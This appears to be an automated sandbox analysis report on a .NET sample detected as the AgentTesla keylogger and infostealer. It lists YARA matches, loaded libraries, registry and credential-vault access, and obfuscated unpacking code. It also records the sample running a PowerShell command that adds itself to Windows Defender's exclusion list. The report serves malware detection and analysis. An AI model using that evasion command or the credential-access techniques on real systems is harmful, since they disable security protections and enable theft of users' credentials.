Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_01084190	4_2_01084190
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_060456E0	4_2_060456E0
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06042EF8	4_2_06042EF8
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06043F58	4_2_06043F58
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0604BD18	4_2_0604BD18
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06049AE8	4_2_06049AE8
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06048B87	4_2_06048B87
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06040040	4_2_06040040
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0604363B	4_2_0604363B
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06045000	4_2_06045000
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06181128	4_2_06181128
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06181123	4_2_06181123
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0618F1B4	4_2_0618F1B4
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06949DA4	4_2_06949DA4
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0108D2D8	4_2_0108D2D8

Source: wKmhzHd4MC.exe, 00000000.00000002.1756028234.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000000.00000002.1757453592.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000000.00000002.1758987685.0000000003C89000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000000.00000000.1724174305.0000000000852000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSaOH.exe2 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000000.00000002.1774102945.0000000007600000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000004.00000002.2966477263.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamecef57186-8600-43f5-9c05-f8d076dd51f0.exe4 vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe, 00000004.00000002.2966702811.00000000009A8000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs wKmhzHd4MC.exe
Source: wKmhzHd4MC.exe	Binary or memory string: OriginalFilenameSaOH.exe2 vs wKmhzHd4MC.exe

Source: wKmhzHd4MC.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.wKmhzHd4MC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.wKmhzHd4MC.exe.3ec8c50.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload

Source: wKmhzHd4MC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 4JJG6X.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, 8C78isHTVco.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.wKmhzHd4MC.exe.3e8e830.4.raw.unpack, CqSP68Ir.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, QnWS1PZql0uxAoieUc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EifTAZOoEMixPruKRG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, QnWS1PZql0uxAoieUc.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: wKmhzHd4MC.exe	Binary or memory string: .vsmidi.sln
Source: wKmhzHd4MC.exe	Binary or memory string: .csproj;Hadouken.Properties.Resources

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/6@1/1

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\wKmhzHd4MC.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nx14kgao.zu4.ps1

Jump to behavior

Source: wKmhzHd4MC.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: wKmhzHd4MC.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: wKmhzHd4MC.exe

ReversingLabs: Detection: 68%

Source: wKmhzHd4MC.exe

String found in binary or memory: Bookmark-add

Source: unknown	Process created: C:\Users\user\Desktop\wKmhzHd4MC.exe "C:\Users\user\Desktop\wKmhzHd4MC.exe"
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Users\user\Desktop\wKmhzHd4MC.exe "C:\Users\user\Desktop\wKmhzHd4MC.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\wKmhzHd4MC.exe"	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Process created: C:\Users\user\Desktop\wKmhzHd4MC.exe "C:\Users\user\Desktop\wKmhzHd4MC.exe"	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: wKmhzHd4MC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: wKmhzHd4MC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: wKmhzHd4MC.exe, Login.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.2cb6450.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, EifTAZOoEMixPruKRG.cs	.Net Code: IZmc0LmrZu7Ha2mZd0V System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.2d19fec.3.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.2d042cc.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.2cc6cfc.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.3f0a850.6.raw.unpack, EifTAZOoEMixPruKRG.cs	.Net Code: IZmc0LmrZu7Ha2mZd0V System.Reflection.Assembly.Load(byte[])
Source: 0.2.wKmhzHd4MC.exe.7330000.7.raw.unpack, QBy45BY4uMbUQs88Qq.cs	.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_0618AA20 push es; ret	4_2_0618AA30
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_069442E8 push eax; iretd	4_2_069442E9
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_069420F0 push es; ret	4_2_06942100
Source: C:\Users\user\Desktop\wKmhzHd4MC.exe	Code function: 4_2_06943E40 pushfd ; retf	4_2_06943E45

Source: wKmhzHd4MC.exe

Static PE information: section name: .text entropy: 7.795735021973012

Source: 0.2.wKmhzHd4MC.exe.2cb6450.0.raw.unpack, kD0JNdgNBriBGn5egS.cs	High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
Source: 0.2.wKmhzHd4MC.exe.2cb6450.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs	High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, VT1QWiS9wPgy5kukcA.cs	High entropy of concatenated method names: 'jP24anWS1P', 'Hl04OuxAoi', 'sHW4hSRNOn', 'mUR4vV4gBS', 'FE646uyvAx', 'vSW48PeQlP', 'SR5ZAg5Hig3LmNlQFR', 'SI8NK8iREslUX6qA6L', 'NxYoF5X61EhOnGHK0q', 'tA844OwPJJ'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, aQrOrb9nrPBrfEigo5.cs	High entropy of concatenated method names: 'LVfEFP4RUT', 'jQnE1kCeUM', 'fyZEq88SA5', 'mtfE3RIpek', 'KEMEf8brbx', 'wSIEM0Plo8', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, J9NrSd4eMoIiCI2mE42.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hj6AfK4xcS', 'Q4gAN4CejW', 'rtyAtSXT9R', 'KNqAiwUd9c', 'XaNAy6aWsu', 'BxtAwDQEgH', 'twYAD0ByBS'
Source: 0.2.wKmhzHd4MC.exe.7600000.8.raw.unpack, x0AH4Etar2Z6317Eoj.cs	High entropy of concatenated method names: 'ToString', 'H928xslqrh', 'D2y81w788c', 'oQS8qs5Esb', 'wqX83JvL1V', 'dEp8MvvRVk', 'xnr85Ws62l', 'xhj8IopGMi', 'vlX8dAl0jK', 'kyE8GtpMoF'
